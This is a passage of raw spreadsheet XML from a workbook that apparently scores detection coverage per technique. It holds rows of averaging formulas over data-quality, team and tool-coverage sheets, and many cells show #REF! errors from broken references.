        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F15&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F15))-LEN(SUBSTITUTE(TRIM(F15),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I15" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F15&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F15))-LEN(SUBSTITUTE(TRIM(F15),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J15" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F15&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F15))-LEN(SUBSTITUTE(TRIM(F15),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K15" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L15" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F15&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F15))-LEN(SUBSTITUTE(TRIM(F15),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M15" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N15" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F15&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F15))-LEN(SUBSTITUTE(TRIM(F15),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O15" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P15" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F15&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F15))-LEN(SUBSTITUTE(TRIM(F15),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q15" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R15" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F15&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F15))-LEN(SUBSTITUTE(TRIM(F15),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S15" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T15" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F15&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F15))-LEN(SUBSTITUTE(TRIM(F15),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U15" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V15" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F15&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F15))-LEN(SUBSTITUTE(TRIM(F15),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W15" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X15" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F15&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F15))-LEN(SUBSTITUTE(TRIM(F15),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y15" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="16" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A16" s="8" t="s">
        <v>20</v>
      </c>
      <c r="B16" s="8" t="s">
        <v>344</v>
      </c>
      <c r="C16" s="24" t="s">
        <v>353</v>
      </c>
      <c r="D16" s="10" t="s">
        <v>354</v>
      </c>
      <c r="E16" s="10" t="s">
        <v>355</v>
      </c>
      <c r="F16" s="10" t="s">
        <v>356</v>
      </c>
      <c r="G16" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K16,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H16" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F16&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F16))-LEN(SUBSTITUTE(TRIM(F16),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I16" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F16&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F16))-LEN(SUBSTITUTE(TRIM(F16),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J16" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F16&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F16))-LEN(SUBSTITUTE(TRIM(F16),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K16" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L16" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F16&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F16))-LEN(SUBSTITUTE(TRIM(F16),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M16" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N16" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F16&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F16))-LEN(SUBSTITUTE(TRIM(F16),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O16" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P16" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F16&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F16))-LEN(SUBSTITUTE(TRIM(F16),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q16" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R16" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F16&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F16))-LEN(SUBSTITUTE(TRIM(F16),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S16" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T16" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F16&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F16))-LEN(SUBSTITUTE(TRIM(F16),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U16" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V16" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F16&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F16))-LEN(SUBSTITUTE(TRIM(F16),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W16" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X16" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F16&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F16))-LEN(SUBSTITUTE(TRIM(F16),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y16" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="17" spans="1:25" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A17" s="8" t="s">
        <v>122</v>
      </c>
      <c r="B17" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C17" s="8" t="s">
        <v>357</v>
      </c>
      <c r="D17" s="10" t="s">
        <v>358</v>
      </c>
      <c r="E17" s="10" t="s">
        <v>323</v>
      </c>
      <c r="F17" s="10" t="s">
        <v>324</v>
      </c>
      <c r="G17" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K17,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H17" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F17&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F17))-LEN(SUBSTITUTE(TRIM(F17),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I17" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F17&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F17))-LEN(SUBSTITUTE(TRIM(F17),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J17" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F17&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F17))-LEN(SUBSTITUTE(TRIM(F17),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K17" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L17" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F17&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F17))-LEN(SUBSTITUTE(TRIM(F17),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M17" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N17" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F17&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F17))-LEN(SUBSTITUTE(TRIM(F17),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O17" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P17" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F17&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F17))-LEN(SUBSTITUTE(TRIM(F17),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q17" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R17" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F17&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F17))-LEN(SUBSTITUTE(TRIM(F17),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S17" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T17" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F17&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F17))-LEN(SUBSTITUTE(TRIM(F17),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U17" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V17" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F17&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F17))-LEN(SUBSTITUTE(TRIM(F17),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W17" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X17" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F17&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F17))-LEN(SUBSTITUTE(TRIM(F17),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y17" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="18" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A18" s="8" t="s">
        <v>24</v>
      </c>
      <c r="B18" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C18" s="8" t="s">
        <v>359</v>
      </c>
      <c r="D18" s="10" t="s">
        <v>360</v>
      </c>
      <c r="E18" s="10" t="s">
        <v>361</v>
      </c>
      <c r="F18" s="10" t="s">
        <v>362</v>
      </c>
      <c r="G18" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K18,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H18" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F18&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F18))-LEN(SUBSTITUTE(TRIM(F18),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I18" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F18&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F18))-LEN(SUBSTITUTE(TRIM(F18),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J18" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F18&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F18))-LEN(SUBSTITUTE(TRIM(F18),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K18" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L18" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F18&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F18))-LEN(SUBSTITUTE(TRIM(F18),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M18" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N18" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F18&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F18))-LEN(SUBSTITUTE(TRIM(F18),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O18" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P18" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F18&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F18))-LEN(SUBSTITUTE(TRIM(F18),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q18" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R18" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F18&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F18))-LEN(SUBSTITUTE(TRIM(F18),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S18" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T18" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F18&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F18))-LEN(SUBSTITUTE(TRIM(F18),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U18" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V18" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F18&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F18))-LEN(SUBSTITUTE(TRIM(F18),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W18" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X18" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F18&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F18))-LEN(SUBSTITUTE(TRIM(F18),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y18" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="19" spans="1:25" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A19" s="8" t="s">
        <v>100</v>
      </c>
      <c r="B19" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C19" s="8" t="s">
        <v>363</v>
      </c>
      <c r="D19" s="10" t="s">
        <v>364</v>
      </c>
      <c r="E19" s="10" t="s">
        <v>323</v>
      </c>
      <c r="F19" s="10" t="s">
        <v>365</v>
      </c>
      <c r="G19" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K19,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H19" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F19&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F19))-LEN(SUBSTITUTE(TRIM(F19),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I19" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F19&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F19))-LEN(SUBSTITUTE(TRIM(F19),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J19" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F19&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F19))-LEN(SUBSTITUTE(TRIM(F19),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K19" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L19" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F19&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F19))-LEN(SUBSTITUTE(TRIM(F19),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M19" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N19" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F19&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F19))-LEN(SUBSTITUTE(TRIM(F19),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O19" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P19" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F19&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F19))-LEN(SUBSTITUTE(TRIM(F19),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q19" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R19" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F19&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F19))-LEN(SUBSTITUTE(TRIM(F19),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S19" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T19" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F19&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F19))-LEN(SUBSTITUTE(TRIM(F19),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U19" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V19" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F19&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F19))-LEN(SUBSTITUTE(TRIM(F19),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W19" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X19" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F19&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F19))-LEN(SUBSTITUTE(TRIM(F19),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y19" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="20" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A20" s="8" t="s">
        <v>214</v>
      </c>
      <c r="B20" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C20" s="8" t="s">
        <v>366</v>
      </c>
      <c r="D20" s="10" t="s">
        <v>367</v>
      </c>
      <c r="E20" s="10" t="s">
        <v>368</v>
      </c>
      <c r="F20" s="10" t="s">
        <v>369</v>
      </c>
      <c r="G20" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K20,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H20" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F20&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F20))-LEN(SUBSTITUTE(TRIM(F20),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I20" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F20&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F20))-LEN(SUBSTITUTE(TRIM(F20),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J20" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F20&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F20))-LEN(SUBSTITUTE(TRIM(F20),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K20" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L20" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F20&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F20))-LEN(SUBSTITUTE(TRIM(F20),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M20" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N20" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F20&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F20))-LEN(SUBSTITUTE(TRIM(F20),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O20" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P20" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F20&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F20))-LEN(SUBSTITUTE(TRIM(F20),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q20" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R20" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F20&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F20))-LEN(SUBSTITUTE(TRIM(F20),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S20" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T20" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F20&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F20))-LEN(SUBSTITUTE(TRIM(F20),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U20" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V20" s="20" t="e">
